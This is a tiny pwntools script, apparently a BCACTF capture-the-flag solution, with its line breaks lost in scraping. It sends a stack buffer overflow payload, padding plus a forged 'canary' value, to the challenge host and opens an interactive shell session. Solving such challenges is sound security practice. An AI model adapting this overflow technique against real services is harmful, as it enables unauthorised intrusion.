#
1 2 3 4 5 6 7
from pwn import *p = remote("challs.bcactf.com", "31615")p.sendline(b"A" * 0x49 + b"canary\x00" + b"Z")p.interactive()